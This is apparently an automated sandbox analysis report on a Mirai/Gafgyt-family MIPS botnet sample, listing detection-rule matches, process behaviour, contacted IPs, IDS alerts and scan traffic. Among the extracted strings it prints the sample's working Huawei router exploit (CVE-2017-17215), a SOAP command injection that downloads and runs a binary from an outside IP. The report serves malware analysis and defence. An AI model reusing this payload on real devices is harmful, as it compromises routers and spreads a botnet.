Source: Process Memory Space: 6lqMB7o2Ts.elf PID: 6240, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown

Source: 6lqMB7o2Ts.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6230.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6240.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: 6lqMB7o2Ts.elf PID: 6230, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: 6lqMB7o2Ts.elf PID: 6240, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16

Source: ELF static info symbol of initial sample

.symtab present: no

Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	String containing 'busybox' found: bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/busybox/bin/watchdog/bin/systemdw5q6he3dbrsgmclkiu4to18npavj702f@

Source: classification engine

Classification label: mal92.troj.linELF@0/0@105/0

Persistence and Installation Behavior

Sets full permissions to files and/or directories

Source: /bin/sh (PID: 6237)

Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/systemd

Source: /bin/sh (PID: 6235)

Mkdir executable: /usr/bin/mkdir -> mkdir bin

Source: /bin/sh (PID: 6237)

Chmod executable: /usr/bin/chmod -> chmod 777 bin/systemd

Source: /usr/bin/chmod (PID: 6237)

File: /tmp/bin/systemd (bits: - usr: rwx grp: rwx all: rwx)

Jump to behavior

Source: /tmp/6lqMB7o2Ts.elf (PID: 6232)

Shell command executed: sh -c "rm -rf bin/systemd && mkdir bin; >bin/systemd && mv /tmp/6lqMB7o2Ts.elf bin/systemd; chmod 777 bin/systemd"

Source: /bin/sh (PID: 6234)

Rm executable: /usr/bin/rm -> rm -rf bin/systemd

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 45516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41076 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 41076
Source: unknown	Network traffic detected: HTTP traffic on port 45516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50306 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50306 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50306 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50306 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50306 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46544 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50306 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45438 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55228 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52002 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52002 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52002 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50306 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58734 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 58734
Source: unknown	Network traffic detected: HTTP traffic on port 50306 -> 37215

Source: /tmp/6lqMB7o2Ts.elf (PID: 6230)

Queries kernel information via 'uname':

Source: 6lqMB7o2Ts.elf, 6230.1.00007ffdb5c81000.00007ffdb5ca2000.rw-.sdmp, 6lqMB7o2Ts.elf, 6240.1.00007ffdb5c81000.00007ffdb5ca2000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/6lqMB7o2Ts.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/6lqMB7o2Ts.elf
Source: 6lqMB7o2Ts.elf, 6230.1.000055c9a9a81000.000055c9a9b08000.rw-.sdmp, 6lqMB7o2Ts.elf, 6240.1.000055c9a9a81000.000055c9a9b08000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: 6lqMB7o2Ts.elf, 6230.1.000055c9a9a81000.000055c9a9b08000.rw-.sdmp, 6lqMB7o2Ts.elf, 6240.1.000055c9a9a81000.000055c9a9b08000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mipsel
Source: 6lqMB7o2Ts.elf, 6230.1.00007ffdb5c81000.00007ffdb5ca2000.rw-.sdmp, 6lqMB7o2Ts.elf, 6240.1.00007ffdb5c81000.00007ffdb5ca2000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: 6lqMB7o2Ts.elf, type: SAMPLE
Source: Yara match	File source: 6230.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6240.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp, type: MEMORY

Yara detected Moobot

Source: Yara match	File source: 6lqMB7o2Ts.elf, type: SAMPLE
Source: Yara match	File source: 6230.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6240.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6lqMB7o2Ts.elf PID: 6230, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: 6lqMB7o2Ts.elf, type: SAMPLE
Source: Yara match	File source: 6230.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6240.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp, type: MEMORY

Yara detected Moobot

Source: Yara match	File source: 6lqMB7o2Ts.elf, type: SAMPLE
Source: Yara match	File source: 6230.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6240.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6lqMB7o2Ts.elf PID: 6230, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	Path Interception	Path Interception	2 File and Directory Permissions Modification	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Scripting	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
6lqMB7o2Ts.elf	59%	ReversingLabs	Linux.Trojan.Mirai
6lqMB7o2Ts.elf	61%	Virustotal		Browse

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/soap/encoding/	6lqMB7o2Ts.elf	false		high
http://schemas.xmlsoap.org/soap/envelope/	6lqMB7o2Ts.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
87.213.190.11	unknown	Netherlands	13127	VERSATELASfortheTrans-EuropeanTele2IPTransportbackbo	false
41.36.131.167	unknown	Egypt	8452	TE-ASTE-ASEG	false
197.58.66.159	unknown	Egypt	8452	TE-ASTE-ASEG	false
197.220.190.33	unknown	Ghana	37341	GLOMOBILEGH	false
197.86.54.125	unknown	South Africa	10474	OPTINETZA	false
157.203.49.95	unknown	United Kingdom	21369	SEMA-UK-ASGB	false
39.79.149.79	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
157.48.46.102	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
75.125.242.147	unknown	United States	36351	SOFTLAYERUS	false
197.13.10.216	unknown	Tunisia	37504	MeninxTN	false
39.117.85.134	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
157.202.188.31	unknown	United States	1759	TSF-IP-CORETeliaFinlandOyjEU	false
157.40.6.77	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
86.55.14.254	unknown	Iran (ISLAMIC Republic Of)	197207	MCCI-ASIR	false
157.129.143.141	unknown	Finland	41701	CAP-FIN-ASFI	false
41.16.118.241	unknown	South Africa	36994	Vodacom-VBZA	false
157.90.119.127	unknown	United States	766	REDIRISRedIRISAutonomousSystemES	false
197.233.216.89	unknown	Namibia	36999	TELECOM-NAMIBIANA	false
41.205.82.241	unknown	Cameroon	36905	Creolink-ASNCM	false
197.210.52.180	unknown	Nigeria	29465	VCG-ASNG	false
197.31.140.190	unknown	Tunisia	37492	ORANGE-TN	false
41.242.195.81	unknown	South Africa	37105	NEOLOGY-ASZA	false
41.220.60.244	unknown	unknown	36900	UNASSIGNED	false
197.240.218.219	unknown	unknown	37705	TOPNETTN	false
177.234.21.222	unknown	Mexico	13591	MexicoReddeTelecomunicacionesSdeRLdeCVMX	false
157.245.2.251	unknown	United States	14061	DIGITALOCEAN-ASNUS	false
41.172.244.43	unknown	South Africa	36937	Neotel-ASZA	false
197.65.94.91	unknown	South Africa	16637	MTNNS-ASZA	false
41.190.129.206	unknown	Mauritius	36997	INFOCOM-UG	false
197.176.2.41	unknown	Kenya	33771	SAFARICOM-LIMITEDKE	false
157.180.38.236	unknown	Sweden	22192	SSHENETUS	false
41.116.198.169	unknown	South Africa	16637	MTNNS-ASZA	false
157.29.116.114	unknown	Italy	8968	BT-ITALIAIT	false
197.186.206.49	unknown	Tanzania United Republic of	37133	airtel-tz-asTZ	false
41.177.165.227	unknown	South Africa	36874	CybersmartZA	false
197.31.148.1	unknown	Tunisia	37492	ORANGE-TN	false
41.243.103.146	unknown	Congo The Democratic Republic of The	37684	ANGANI-ASKE	false
41.182.10.68	unknown	Namibia	36996	TELECOM-NAMIBIANA	false
41.95.189.153	unknown	Sudan	36998	SDN-MOBITELSD	false
157.77.107.252	unknown	Japan	4678	FINECanonITSolutionsIncJP	false
157.250.6.188	unknown	United States	32934	FACEBOOKUS	false
197.16.224.23	unknown	Tunisia	37693	TUNISIANATN	false
166.248.166.103	unknown	United States	22394	CELLCOUS	false
67.231.248.15	unknown	United States	40244	TURNKEY-INTERNETUS	false
157.74.15.86	unknown	Japan	131932	JEIS-NETJREastInformationSystemsCompanyJP	false
99.255.49.46	unknown	Canada	812	ROGERS-COMMUNICATIONSCA	false
41.145.58.85	unknown	South Africa	5713	SAIX-NETZA	false
41.133.99.106	unknown	South Africa	10474	OPTINETZA	false
181.155.228.131	unknown	Colombia	26611	COMCELSACO	false
157.47.196.245	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
148.230.177.14	unknown	Mexico	3549	LVLT-3549US	false
197.12.205.119	unknown	Tunisia	37703	ATLAXTN	false
157.1.148.117	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
197.190.238.237	unknown	Ghana	37140	zain-asGH	false
41.216.159.4	unknown	Burkina Faso	37073	IPP-burkina-asBF	false
41.120.89.167	unknown	South Africa	16637	MTNNS-ASZA	false
197.9.0.253	unknown	Tunisia	5438	ATI-TN	false
24.132.41.40	unknown	Netherlands	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
157.94.173.77	unknown	Finland	51164	CYBERCOM-FICybercomFinlandOyFI	false
157.172.225.252	unknown	France	22192	SSHENETUS	false
197.89.97.51	unknown	South Africa	10474	OPTINETZA	false
41.88.141.232	unknown	Egypt	33771	SAFARICOM-LIMITEDKE	false
197.72.190.161	unknown	South Africa	16637	MTNNS-ASZA	false
197.158.15.171	unknown	Mozambique	30619	TDM-ASMZ	false
169.186.225.238	unknown	United States	37611	AfrihostZA	false
157.108.225.9	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
41.143.116.57	unknown	Morocco	36903	MT-MPLSMA	false
41.69.75.113	unknown	Egypt	24835	RAYA-ASEG	false
197.219.202.95	unknown	Mozambique	37342	MOVITELMZ	false
111.71.132.78	unknown	Taiwan; Republic of China (ROC)	17421	EMOME-NETMobileBusinessGroupTW	false
98.30.11.116	unknown	United States	10796	TWC-10796-MIDWESTUS	false
126.32.30.4	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
213.95.251.204	unknown	Germany	12337	NORIS-NETWORKITServiceProviderlocatedinNuernbergGerm	false
95.199.194.164	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	false
41.179.133.53	unknown	Egypt	24863	LINKdotNET-ASEG	false
197.37.36.139	unknown	Egypt	8452	TE-ASTE-ASEG	false
197.82.246.62	unknown	South Africa	10474	OPTINETZA	false
157.21.225.99	unknown	United States	53446	EVMSUS	false
197.66.218.65	unknown	South Africa	16637	MTNNS-ASZA	false
41.18.169.222	unknown	South Africa	29975	VODACOM-ZA	false
157.232.147.215	unknown	United States	4704	SANNETRakutenMobileIncJP	false
197.204.213.172	unknown	Algeria	36947	ALGTEL-ASDZ	false
197.4.89.169	unknown	Tunisia	5438	ATI-TN	false
64.157.89.206	unknown	United States	3064	AFFINITY-FTLUS	false
41.176.43.255	unknown	Egypt	36992	ETISALAT-MISREG	false
41.182.22.210	unknown	Namibia	36996	TELECOM-NAMIBIANA	false
77.6.87.85	unknown	Germany	6805	TDDE-ASN1DE	false
77.74.199.254	unknown	United Kingdom	42831	UKSERVERS-ASUKDedicatedServersHostingandCo-Location	false
163.208.44.35	unknown	Japan	7502	IP-KYOTOAdvancedSoftwareTechnologyManagementResearch	false
157.37.30.219	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
41.77.59.125	unknown	South Africa	36985	GMSZA	false
41.14.238.56	unknown	South Africa	29975	VODACOM-ZA	false
138.176.152.51	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
41.74.140.210	unknown	Cape Verde	37517	CV-MultimediaCV	false
197.73.232.43	unknown	South Africa	16637	MTNNS-ASZA	false
157.148.116.61	unknown	China	136958	UNICOM-GUANGZHOU-IDCChinaUnicomGuangdongIPnetworkCN	false
41.125.107.227	unknown	South Africa	16637	MTNNS-ASZA	false
157.230.191.4	unknown	United States	14061	DIGITALOCEAN-ASNUS	false
197.185.70.90	unknown	South Africa	37105	NEOLOGY-ASZA	false
157.204.30.224	unknown	United States	54216	GORE-NETWORKUS	false

File type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.52397672760205
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	6lqMB7o2Ts.elf
File size:	84780
MD5:	1f34c5bcd411c95d5bdff565afd27afd
SHA1:	39a1f8fff95e7c4d693d0d3fbc2d49749f3ba395
SHA256:	a9b25052579b7f41a1f985ed6d95f0eef2f00e8ad0e9a16dafad5ea38cb1b128
SHA512:	e1a92b793af4d9bdba266b6e7c54098a86c87e440d93cb26953a953272d3e783b7c365993d42f346e72dc912971fde5c3311aa38ef17d4d3e111e28579c8822f
SSDEEP:	1536:iVLyu95KRKKkj752dCexuV/8UZlDwfkJ4MYfWa:iVLyMgWFezxu5VD1eX
TLSH:	1683D606BB510FF7DC6FCD370AE91702348C594A22A97B367634D828F65B24B59E3CA4
File Content Preview:	.ELF....................`.@.4....H......4. ...(...............@...@..;...;...............@...@E..@E......+..........Q.td...............................<\..'!......'.......................<8..'!... .........9'.. ........................<...'!.............9

Static ELF Info

ELF header
Class:
Data:
Version:
Machine:
Version Number:
Type:
OS/ABI:
ABI Version:
Entry Point Address:
Flags:
ELF Header Size:
Program Header Offset:
Program Header Size:
Number of Program Headers:
Section Header Offset:
Section Header Size:
Number of Section Headers:
Header String Table Index:

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x11b10	0x0	0x6	AX	16
.fini	PROGBITS	0x411c30	0x11c30	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x411c90	0x11c90	0x1f00	0x0	0x2	A	16
.ctors	PROGBITS	0x454000	0x14000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x454008	0x14008	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x454014	0x14014	0x44	0x0	0x3	WA	4
.data	PROGBITS	0x454060	0x14060	0x3a0	0x0	0x3	WA	16
.got	PROGBITS	0x454400	0x14400	0x498	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x454898	0x14898	0x1c	0x0	0x10000003	WAp	4
.bss	NOBITS	0x4548c0	0x14898	0x2250	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0x9c6	0x14898	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x14898	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x13b90	0x13b90	5.6031	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x14000	0x454000	0x454000	0x898	0x2b10	3.8763	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.23191.61.26.7952002372152835222 03/20/23-18:15:41.479492	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	52002	37215	192.168.2.23	191.61.26.79
192.168.2.2341.239.25.9858734372152835222 03/20/23-18:16:18.194286	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	58734	37215	192.168.2.23	41.239.25.98
192.168.2.2377.136.237.16045516372152835222 03/20/23-18:14:44.802279	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	45516	37215	192.168.2.23	77.136.237.160
192.168.2.23103.54.44.13350306372152835222 03/20/23-18:15:01.586540	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	50306	37215	192.168.2.23	103.54.44.133
192.168.2.23104.128.127.22846544372152835222 03/20/23-18:15:22.996810	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	46544	37215	192.168.2.23	104.128.127.228
192.168.2.2341.238.196.11641076372152835222 03/20/23-18:14:59.321194	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	41076	37215	192.168.2.23	41.238.196.116
192.168.2.2334.120.131.845438372152835222 03/20/23-18:15:29.072769	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	45438	37215	192.168.2.23	34.120.131.8
192.168.2.2394.187.108.18555228372152835222 03/20/23-18:15:36.209617	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	55228	37215	192.168.2.23	94.187.108.185

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 20, 2023 18:14:40.715014935 CET	36142	37215	192.168.2.23	197.177.188.105
Mar 20, 2023 18:14:40.715137959 CET	36142	37215	192.168.2.23	41.59.173.161
Mar 20, 2023 18:14:40.715172052 CET	36142	37215	192.168.2.23	157.84.173.102
Mar 20, 2023 18:14:40.715186119 CET	36142	37215	192.168.2.23	157.172.201.119
Mar 20, 2023 18:14:40.715229034 CET	36142	37215	192.168.2.23	41.88.124.244
Mar 20, 2023 18:14:40.715279102 CET	36142	37215	192.168.2.23	197.234.113.162
Mar 20, 2023 18:14:40.715279102 CET	36142	37215	192.168.2.23	41.240.223.204
Mar 20, 2023 18:14:40.715289116 CET	36142	37215	192.168.2.23	197.159.13.122
Mar 20, 2023 18:14:40.715311050 CET	36142	37215	192.168.2.23	41.187.14.3
Mar 20, 2023 18:14:40.715375900 CET	36142	37215	192.168.2.23	157.109.52.196
Mar 20, 2023 18:14:40.715419054 CET	36142	37215	192.168.2.23	41.28.198.60
Mar 20, 2023 18:14:40.715439081 CET	36142	37215	192.168.2.23	157.48.46.102
Mar 20, 2023 18:14:40.715451002 CET	36142	37215	192.168.2.23	41.213.200.22
Mar 20, 2023 18:14:40.715518951 CET	36142	37215	192.168.2.23	157.108.205.143
Mar 20, 2023 18:14:40.715581894 CET	36142	37215	192.168.2.23	148.94.3.83
Mar 20, 2023 18:14:40.715616941 CET	36142	37215	192.168.2.23	197.37.53.79
Mar 20, 2023 18:14:40.715648890 CET	36142	37215	192.168.2.23	157.156.162.199
Mar 20, 2023 18:14:40.715677023 CET	36142	37215	192.168.2.23	157.205.17.4
Mar 20, 2023 18:14:40.715698957 CET	36142	37215	192.168.2.23	41.173.117.4
Mar 20, 2023 18:14:40.715728045 CET	36142	37215	192.168.2.23	197.35.113.47
Mar 20, 2023 18:14:40.715751886 CET	36142	37215	192.168.2.23	41.18.245.29
Mar 20, 2023 18:14:40.715771914 CET	36142	37215	192.168.2.23	41.91.82.148
Mar 20, 2023 18:14:40.715795040 CET	36142	37215	192.168.2.23	157.249.225.91
Mar 20, 2023 18:14:40.715818882 CET	36142	37215	192.168.2.23	157.38.65.127
Mar 20, 2023 18:14:40.715837002 CET	36142	37215	192.168.2.23	153.6.146.12
Mar 20, 2023 18:14:40.715878010 CET	36142	37215	192.168.2.23	41.165.42.202
Mar 20, 2023 18:14:40.715928078 CET	36142	37215	192.168.2.23	221.4.37.244
Mar 20, 2023 18:14:40.715949059 CET	36142	37215	192.168.2.23	207.233.206.196
Mar 20, 2023 18:14:40.715971947 CET	36142	37215	192.168.2.23	76.155.143.172
Mar 20, 2023 18:14:40.715996981 CET	36142	37215	192.168.2.23	41.85.67.18
Mar 20, 2023 18:14:40.716017008 CET	36142	37215	192.168.2.23	197.222.143.196
Mar 20, 2023 18:14:40.716042042 CET	36142	37215	192.168.2.23	41.115.11.233
Mar 20, 2023 18:14:40.716078043 CET	36142	37215	192.168.2.23	157.60.205.239
Mar 20, 2023 18:14:40.716131926 CET	36142	37215	192.168.2.23	197.100.148.206
Mar 20, 2023 18:14:40.716147900 CET	36142	37215	192.168.2.23	62.145.68.134
Mar 20, 2023 18:14:40.716171026 CET	36142	37215	192.168.2.23	197.228.77.157
Mar 20, 2023 18:14:40.716192007 CET	36142	37215	192.168.2.23	180.9.6.101
Mar 20, 2023 18:14:40.716216087 CET	36142	37215	192.168.2.23	61.98.120.1
Mar 20, 2023 18:14:40.716234922 CET	36142	37215	192.168.2.23	197.20.252.229
Mar 20, 2023 18:14:40.716258049 CET	36142	37215	192.168.2.23	38.159.96.79
Mar 20, 2023 18:14:40.716276884 CET	36142	37215	192.168.2.23	157.227.185.30
Mar 20, 2023 18:14:40.716329098 CET	36142	37215	192.168.2.23	197.0.84.190
Mar 20, 2023 18:14:40.716358900 CET	36142	37215	192.168.2.23	197.177.127.55
Mar 20, 2023 18:14:40.716399908 CET	36142	37215	192.168.2.23	197.88.204.252
Mar 20, 2023 18:14:40.716419935 CET	36142	37215	192.168.2.23	197.95.151.221
Mar 20, 2023 18:14:40.716448069 CET	36142	37215	192.168.2.23	41.149.105.154
Mar 20, 2023 18:14:40.716491938 CET	36142	37215	192.168.2.23	197.89.253.13
Mar 20, 2023 18:14:40.716516018 CET	36142	37215	192.168.2.23	197.25.121.167
Mar 20, 2023 18:14:40.716535091 CET	36142	37215	192.168.2.23	197.6.247.30
Mar 20, 2023 18:14:40.716557026 CET	36142	37215	192.168.2.23	157.33.174.150
Mar 20, 2023 18:14:40.716583014 CET	36142	37215	192.168.2.23	197.85.159.199
Mar 20, 2023 18:14:40.716609955 CET	36142	37215	192.168.2.23	157.74.67.240
Mar 20, 2023 18:14:40.716628075 CET	36142	37215	192.168.2.23	197.101.97.14
Mar 20, 2023 18:14:40.716651917 CET	36142	37215	192.168.2.23	72.105.46.194
Mar 20, 2023 18:14:40.716695070 CET	36142	37215	192.168.2.23	41.181.81.43
Mar 20, 2023 18:14:40.716717958 CET	36142	37215	192.168.2.23	90.189.98.38
Mar 20, 2023 18:14:40.716741085 CET	36142	37215	192.168.2.23	41.47.217.188
Mar 20, 2023 18:14:40.716777086 CET	36142	37215	192.168.2.23	197.53.85.60
Mar 20, 2023 18:14:40.716831923 CET	36142	37215	192.168.2.23	41.79.9.215
Mar 20, 2023 18:14:40.716857910 CET	36142	37215	192.168.2.23	197.231.20.205
Mar 20, 2023 18:14:40.716886044 CET	36142	37215	192.168.2.23	41.200.222.12
